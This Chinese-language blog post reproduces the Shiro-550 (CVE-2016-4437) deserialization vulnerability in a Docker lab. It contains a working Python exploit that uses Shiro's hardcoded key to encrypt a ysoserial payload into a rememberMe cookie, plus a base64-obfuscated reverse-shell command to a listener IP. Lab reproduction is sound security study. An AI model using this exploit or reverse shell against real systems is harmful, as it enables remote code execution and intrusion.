Shiro RememberMe 1.2.4 反序列化漏洞(Shiro-550, CVE-2016-4437)復現

前言

接下來一段時間要做漏洞復現和代碼審計，算是一個小目標把

開始

環境搭建

使用docker復現
啓動docker

systemctl start docker

下載鏡像和啓動環境

docker pull medicean/vulapps:s_shiro_1
docker run -d -p 81:8080 medicean/vulapps:s_shiro_1

因爲centos有apache佔用了80，這裏的81端口可以自己修改

工具準備

1.shiro_poc.py

# pip install pycrypto
import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA=="
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
    with open("/tmp/payload.cookie", "w") as fpw:
        print("rememberMe={}".format(payload.decode()), file=fpw)

將這個腳本放到tmp目錄下

2.ysoserial的jar文件

安裝git

apt-get install git

安裝maven

wget https://downloads.apache.org/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz

cd /usr/local
tar -zxvf apache-maven-3.6.3-bin.tar.gz
vi /etc/profile
export MAVEN_HOME=/usr/local/apache-maven-3.6.3
export PATH=$MAVEN_HOME/bin:$PATH 
source /etc/profile
mvn -v 

/usr/local/apache-maven-3.6.3/conf/setting.xml
找到mirrors節點添加阿里鏡像庫地址：

 <mirrors>
       <mirror>
             <id>alimaven</id>
              <name>aliyun maven</name>
              <url>http://maven.aliyun.com/nexus/content/groups/public/</url>
               <mirrorOf>central</mirrorOf>        
      </mirror>
  </mirrors>

git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -DskipTests
cp target/ysoserial-0.0.6-SNAPSHOT-all.jar /tmp

安裝模塊

pip3 install pycrypto

開始執行

要執行的命令命令

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzUvMjM0NSAwPiYx}|{base64,-d}|{bash,-i}

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzUvMjM0NSAwPiYx爲bash -i >& /dev/tcp/192.168.164.135/2345 0>&1經過base64編碼
開啓監聽

nc -lvvp 2345

python3 shiro_poc.py "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzUvMjM0NSAwPiYx}|{base64,-d}|{bash,-i}"

會在/tmp下找到payload.cookie
瀏覽器打開網址並登陸進去，點擊account page抓包

用payload.cookie中內容替換Cookie中的全部內容

回到監聽查看

已經得到權限

參考文章

https://paper.seebug.org/shiro-rememberme-1-2-4/#0x01
https://www.cnblogs.com/paperpen/p/11312671.html
https://www.cnblogs.com/tr1ple/p/11662193.html